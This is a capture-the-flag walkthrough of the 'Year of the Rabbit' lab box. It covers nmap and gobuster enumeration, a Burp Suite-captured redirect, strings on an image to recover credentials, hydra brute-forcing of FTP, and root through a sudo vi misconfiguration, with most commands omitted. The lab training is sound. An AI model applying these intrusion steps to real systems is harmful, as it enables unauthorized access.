Year of the Rabbit
Reconnaissance
Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)
Detailed Nmap Scan :
Command Breakdown:
(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 21,22,80
(-oN nmap): Saving it into a file called nmap
Enumeration
Lets visit the webserver
It an apache2 default page, lets run gobuster to find hidden directories and pages.
We found a directory called /assets lets go visit it.
There are two files, lets check the first one which is a mp4 file , a video file. First we get a message telling us to turn off Javascript, followed by a redirection to a Rick Astley video . RICK ROLLED!
Lets go turn off Javascript, Navigate to about:config
in the browser and then search for Javascript, change the javascript.enabled
parameter to false.
Also looking at the other file, we need something interesting
Lets visit this page.
Listening through the audio, at second 56 we get the hint: "I'll put you out of your misery burp you're looking in the wrong place. Looking at this they are probably hinting to use Burpsuite
so lets do that.
Lets capture the request of visiting this page. After capturing the request and forwarding it once, you get something interesting
Its a directory, lets go visit it.
There is one file, lets check it out
Its a picture. Lets use our steganography skills to see if there is anything hidden in the picture. First we need to download the file, so lets do that.
Now lets use steghide
and binwalk
to see if we can find anything in this image. There was nothing, so l just used strings on the image.
Once I did this, I got some output and scrolling up a bit I got something interest
So we have a username and a password list, lets copy the password list to a file and use hydra
to bruteforce ftp with the username and password list we have. I saved the password into a list called passwords.lst
Exploitation
We found the password, lets login through ftp
We are logged in, lets list the files.
Looks like there is a text file, lets transfer this to our machine
Lets read the file
I don't understand this code, so lets put it in a tool that does understand it.
Now we have a password, lets use this to login through ssh with the username we found too.
We are logged in, we can see a message for us. We can find the user flag here but we are not allowed to read it. So we have to escalate privileges.
When we logged in, we see a message for us, there seems to be a leet s3cr3t hiding place
, and there is a hidden message there waiting for us. Lets find it using this command.
Its a directory so lets change directories into it.
Lets list the files in the directory.
Lets read the this file
Looks like we have the password to the user Gwendoline
, so lets switch users.
We can now read the user.txt
file
Privilege Escalation
Lets run sudo -l
to see what this user can run as root
Looks like we can run /usr/bin/vi /home/gwendoline/user.txt
as root, I found this article that explains very well on what to do. First we use the command
And then we use this command
And you are now root.
We can read the root flag.
Last updated